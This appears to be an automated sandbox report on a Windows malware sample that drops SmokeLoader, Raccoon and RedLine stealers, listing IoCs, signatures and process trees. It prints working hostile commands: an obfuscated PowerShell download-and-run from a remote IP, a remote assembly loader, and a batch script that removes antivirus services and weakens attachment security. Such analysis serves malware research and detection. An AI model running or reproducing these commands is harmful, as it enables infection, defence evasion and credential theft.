Analysis
  max time kernel: 150s
  max time network: 119s
  platform: windows10_x64
  resource: win10v20210408
  submitted: 11-08-2021 20:40
  Static task: static1
  Behavioral task: behavioral1
    Sample: d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe
    Resource: win7v20210410
  Behavioral task: behavioral2
    Sample: d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe
    Resource: win10v20210408
General
  Target: d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe
  Size: 207KB
  MD5: 4a24658b8b28d1512378d374676846dc
  SHA1: 1d326b774e7f11bcaffbdb4198db8cc47735e808
  SHA256: d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a70270e30e666c9baa7d
  SHA512: c762af1ea682cfa41bdb211a74cce91600da32ccace258e6dd0b2ed9eb02bad2d01922ef9ccc00a6b1c909d8fe7e3955ded408a0f643da75fcfbb805de4b6d3c
Malware Config
Extracted
  http://91.241.19.52/Api/GetFile2
Extracted
  smokeloader
  2020
Extracted
  raccoon
  2ca2376c561d1af7f8b9e6f3256b06220a3db187
  url4cnc: https://telete.in/johnyes13
Extracted
  raccoon
  cd8dc1031358b1aec55cc6bc447df1018b068607
  url4cnc: https://telete.in/jagressor_kz
Extracted
  raccoon
  471c70de3b4f9e4d493e418d1f60a90659057de0
  url4cnc: https://telete.in/p1rosto100xx
Signatures
-
Raccoon Stealer Payload 5 IoCs
Processes:
  behavioral2/memory/1216-147-0x0000000004970000-0x0000000004A03000-memory.dmp  (yara_rule: family_raccoon)
  behavioral2/memory/1216-154-0x0000000000400000-0x0000000002CB1000-memory.dmp  (yara_rule: family_raccoon)
  behavioral2/memory/3864-159-0x0000000000400000-0x0000000002CB0000-memory.dmp  (yara_rule: family_raccoon)
  behavioral2/memory/2168-215-0x0000000000400000-0x0000000000495000-memory.dmp  (yara_rule: family_raccoon)
  behavioral2/memory/2168-222-0x0000000000400000-0x0000000000495000-memory.dmp  (yara_rule: family_raccoon)
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
Processes:
  C:\Users\Admin\AppData\Local\Temp\1A9F.exe  (yara_rule: family_redline)
  C:\Users\Admin\AppData\Local\Temp\1A9F.exe  (yara_rule: family_redline)
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
Processes:
  PID 3160 (WerFault.exe) created 1216 (target process 1DBD.exe)
  PID 792 (WerFault.exe) created 3864 (target process 1F25.exe)
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Blocklisted process makes network request 1 IoCs
Processes:
  flow 34, pid 4136 (powershell.exe)
-
Downloads MZ/PE file
-
Executes dropped EXE 7 IoCs
Processes:
  pid 2044  1389.exe
  pid 768   1520.exe
  pid 4028  1A9F.exe
  pid 1216  1DBD.exe
  pid 3864  1F25.exe
  pid 684   Runtimebroker.exe
  pid 2168  1520.exe
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
  1A9F.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
  1A9F.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion
-
Deletes itself 1 IoCs
Processes:
  pid 2428 (process column empty in the report)
-
Drops startup file 1 IoCs
Processes:
  Runtimebroker.exe: File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sound device.lnk
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
  C:\Users\Admin\AppData\Local\Temp\1A9F.exe  (yara_rule: themida)
  C:\Users\Admin\AppData\Local\Temp\1A9F.exe  (yara_rule: themida)
  behavioral2/memory/4028-140-0x00000000008A0000-0x00000000008A1000-memory.dmp  (yara_rule: themida)
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
  powershell.exe: Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\Sound device = "Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile(('http://91.241.19.52/Ru'+'nti'+'m'+'ebr'+'oke'+'r.exe'),($env:TEMP+'\\Vp'+'nm.e'+'xe'));Start-Process ($env:TEMP+'\\V'+'pn'+'m.exe')"
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
  1A9F.exe: Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA
-
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
  pid 4028  1A9F.exe
-
Suspicious use of SetThreadContext 2 IoCs
Processes:
  PID 632 (d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe) set thread context of 3188 (target process d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe)
  PID 768 (1520.exe) set thread context of 2168 (target process 1520.exe)
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 22 IoCs
Processes:
  WerFault.exe pid 1820, target pid 2044 (1389.exe)
  WerFault.exe pid 3820, target pid 2044 (1389.exe)
  WerFault.exe pid 2736, target pid 1216 (1DBD.exe)
  WerFault.exe pid 792,  target pid 2044 (1389.exe)
  WerFault.exe pid 1264, target pid 3864 (1F25.exe)
  WerFault.exe pid 996,  target pid 2044 (1389.exe)
  WerFault.exe pid 2904, target pid 1216 (1DBD.exe)
  WerFault.exe pid 2392, target pid 3864 (1F25.exe)
  WerFault.exe pid 1920, target pid 2044 (1389.exe)
  WerFault.exe pid 1944, target pid 1216 (1DBD.exe)
  WerFault.exe pid 4052, target pid 3864 (1F25.exe)
  WerFault.exe pid 3364, target pid 1216 (1DBD.exe)
  WerFault.exe pid 1156, target pid 2044 (1389.exe)
  WerFault.exe pid 3192, target pid 3864 (1F25.exe)
  WerFault.exe pid 3160, target pid 1216 (1DBD.exe)
  WerFault.exe pid 792,  target pid 3864 (1F25.exe)
  WerFault.exe pid 2284, target pid 684 (Runtimebroker.exe)
  WerFault.exe pid 1920, target pid 684 (Runtimebroker.exe)
  WerFault.exe pid 3888, target pid 684 (Runtimebroker.exe)
  WerFault.exe pid 1012, target pid 684 (Runtimebroker.exe)
  WerFault.exe pid 3820, target pid 684 (Runtimebroker.exe)
  WerFault.exe pid 2188, target pid 684 (Runtimebroker.exe)
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
  d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe: Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI
  d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe: Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI
  d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe: Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
  pid 3188  d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe  (2 entries)
  pid 2428  (62 entries; process column empty in the report)
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
  pid 2428 (process column empty in the report)
-
Suspicious behavior: MapViewOfSection 19 IoCs
Processes:
  pid 3188  d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe  (1 entry)
  pid 2428  (18 entries; process column empty in the report)
-
Suspicious use of AdjustPrivilegeToken 61 IoCs
Processes:
  pid 2428 (process column empty in the report): Token: SeShutdownPrivilege (16 entries), Token: SeCreatePagefilePrivilege (16 entries)
  WerFault.exe pid 1820: Token: SeRestorePrivilege, Token: SeBackupPrivilege
  WerFault.exe, Token: SeDebugPrivilege, in order of appearance: pids 1820, 3820, 2736, 792, 1264, 996, 2904, 2392, 1920, 1944, 4052, 1156, 3364, 3192, 3160, 792, 2284, 1920, 3888, 1012, 3820, 2188 (22 entries)
  1A9F.exe pid 4028: Token: SeDebugPrivilege
  1520.exe pid 768: Token: SeDebugPrivilege
  powershell.exe pids 3488, 4136, 4364: Token: SeDebugPrivilege (one entry each)
-
Suspicious use of UnmapMainImage 1 IoCs
Processes:
  pid 2428 (process column empty in the report)
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
  PID 632 (d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe) wrote to memory of 3188 (target process d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe)  (6 entries)
  PID 2428 wrote to memory of 2044 (target process 1389.exe)  (3 entries)
  PID 2428 wrote to memory of 768 (target process 1520.exe)  (3 entries)
  PID 2428 wrote to memory of 4028 (target process 1A9F.exe)  (3 entries)
  PID 2428 wrote to memory of 1216 (target process 1DBD.exe)  (3 entries)
  PID 2428 wrote to memory of 3864 (target process 1F25.exe)  (3 entries)
  PID 2428 wrote to memory of 3748 (target process explorer.exe)  (4 entries)
  PID 2428 wrote to memory of 2080 (target process explorer.exe)  (3 entries)
  PID 2428 wrote to memory of 3296 (target process explorer.exe)  (4 entries)
  PID 2044 (1389.exe) wrote to memory of 684 (target process Runtimebroker.exe)  (3 entries)
  PID 2428 wrote to memory of 3196 (target process explorer.exe)  (3 entries)
  PID 2428 wrote to memory of 2116 (target process explorer.exe)  (4 entries)
  PID 2428 wrote to memory of 2060 (target process explorer.exe)  (3 entries)
  PID 2428 wrote to memory of 1820 (target process explorer.exe)  (4 entries)
  PID 2428 wrote to memory of 1488 (target process explorer.exe)  (3 entries)
  PID 2428 wrote to memory of 3240 (target process explorer.exe)  (4 entries)
  PID 684 (Runtimebroker.exe) wrote to memory of 3488 (target process powershell.exe)  (3 entries)
  PID 768 (1520.exe) wrote to memory of 2168 (target process 1520.exe)  (5 entries)
  (the process column for pid 2428 is empty in the report)
Processes
-
C:\Users\Admin\AppData\Local\Temp\d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe"
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory

  C:\Users\Admin\AppData\Local\Temp\d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe"
    - Checks SCSI registry key(s)
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection

C:\Users\Admin\AppData\Local\Temp\1389.exe
  command line: C:\Users\Admin\AppData\Local\Temp\1389.exe
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\WerFault.exe
    command line: C:\Windows\SysWOW64\WerFault.exe -u -p 2044 -s 708
    - Program crash
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\SysWOW64\WerFault.exe
    command line: C:\Windows\SysWOW64\WerFault.exe -u -p 2044 -s 892
    - Program crash
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\SysWOW64\WerFault.exe
    command line: C:\Windows\SysWOW64\WerFault.exe -u -p 2044 -s 660
    - Program crash

  C:\Windows\SysWOW64\WerFault.exe
    command line: C:\Windows\SysWOW64\WerFault.exe -u -p 2044 -s 916
    - Program crash
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\SysWOW64\WerFault.exe
    command line: C:\Windows\SysWOW64\WerFault.exe -u -p 2044 -s 660
    - Program crash

  C:\Windows\SysWOW64\WerFault.exe
    command line: C:\Windows\SysWOW64\WerFault.exe -u -p 2044 -s 928
    - Program crash
    - Suspicious use of AdjustPrivilegeToken

  C:\ProgramData\Runtimebroker.exe
    command line: "C:\ProgramData\Runtimebroker.exe"
    - Executes dropped EXE
    - Drops startup file
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\WerFault.exe
      command line: C:\Windows\SysWOW64\WerFault.exe -u -p 684 -s 736
      - Program crash
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\SysWOW64\WerFault.exe
      command line: C:\Windows\SysWOW64\WerFault.exe -u -p 684 -s 788
      - Program crash
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\SysWOW64\WerFault.exe
      command line: C:\Windows\SysWOW64\WerFault.exe -u -p 684 -s 760
      - Program crash
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\SysWOW64\WerFault.exe
      command line: C:\Windows\SysWOW64\WerFault.exe -u -p 684 -s 800
      - Program crash
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\SysWOW64\WerFault.exe
      command line: C:\Windows\SysWOW64\WerFault.exe -u -p 684 -s 1008
      - Program crash
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\SysWOW64\WerFault.exe
      command line: C:\Windows\SysWOW64\WerFault.exe -u -p 684 -s 1036
      - Program crash
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      command line: powershell Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Sound device' -Value 'Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile((''http://91.241.19.52/Ru''+''nti''+''m''+''ebr''+''oke''+''r.exe''),($env:TEMP+''\Vp''+''nm.e''+''xe''));Start-Process ($env:TEMP+''\V''+''pn''+''m.exe'')'
      - Adds Run key to start application
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      command line: powershell $dll =[Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData('http://91.241.19.52/Api/GetFile2'));$theType = $dll.GetType('filedll.Program');$method = $theType.GetMethod('Start');$method.Invoke([System.Activator]::CreateInstance($theType),@());rv dll,theType,method
      - Blocklisted process makes network request
      - Suspicious use of AdjustPrivilegeToken

      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        command line: "powershell" Get-MpPreference -verbose
        - Suspicious use of AdjustPrivilegeToken
      C:\Windows\SysWOW64\cmd.exe
        command line: "C:\Windows\System32\cmd.exe" followed by the batch script below (recorded as one run-on command line; reflowed here one command per line)
          @echo off
          Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE2.0.0" /f
          Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE1.0.0" /f
          Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP18.0.0" /f
          Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP17.0.0" /f
          Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP16.0.0" /f
          Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP15.0.0" /f
          Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP14.0.0" /f
          Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP13.0.0" /f
          Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP12.0.0" /f
          Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP11.0.0" /f
          Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP10.0.0" /f
          Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MBAMService" /f
          Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAWFwk" /f
          Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MSK80Service" /f
          Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAPExe" /f
          Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McBootDelayStartSvc" /f
          Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mccspsvc" /f
          Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfefire" /f
          Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\HomeNetSvc" /f
          Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ModuleCoreService" /f
          Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McMPFSvc" /f
          Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mcpltsvc" /f
          Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McProxy" /f
          Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McODS" /f
          Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfemms" /f
          Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAfee SiteAdvisor Service" /f
          Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfevtp" /f
          Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McNaiAnn" /f
          Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\nanosvc" /f
          Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\NortonSecurity" /f
          Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\!SASCORE" /f
          Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\SBAMSvc" /f
          Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVAuxSvc" /f
          Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVCoreSvc" /f
          Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\QHActiveDefense" /f
          Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus" /f
          Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Firewall" /f
          Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVG Antivirus" /f
          Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirMailService" /f
          Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirService" /f
          Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\Avira.ServiceHost" /f
          Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirWebService" /f
          Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirSchedulerService" /f
          Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsservppl" /f
          Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ProductAgentService" /f
          Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsserv" /f
          Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\updatesrv" /f
          Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdAgent" /f
          Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdvirth" /f
          Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\DragonUpdater" /f
          Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ekrn" /f
          Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\0247141531883172mcinstcleanup" /f
          Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\PEFService" /f
          set "osX=%PROCESSOR_ARCHITECTURE%"
          if defined PROCESSOR_ARCHITEW6432 set "osX=AMD64"
          if "%osX%"=="x86" (
            Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f
            Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f
            Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f
            Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f
            Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f
            Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f
            Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f
            Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f
            Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg64.exe" /f
            Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlls.dll" /f
            Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlservice.exe" /f
            Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f
            Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -boot" /f
            Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f
            Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f
            Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge" /f
            Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f
            Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f
            Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f
            Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f
            Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f
            Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f
            Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f
            Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f
            Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f
            Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f
            Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f
            Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f
            Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f
          ) else (
            Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f /reg:64
            Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f /reg:64
            Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f /reg:64
            Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f /reg:64
            Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32
            Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f /reg:32
            Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f /reg:32
            Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f /reg:32
            Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg64.exe" /f /reg:32
            Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlls.dll" /f /reg:32
            Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlservice.exe" /f /reg:32
            Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f /reg:32
            Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -boot" /f /reg:32
            Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32
            Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f /reg:32
            Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge" /f /reg:32
            Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:32
            Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:32
            Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:32
            Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:32
            Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:32
            Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:32
            Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:32
            Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:32
            Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:32
            Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:32
            Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:32
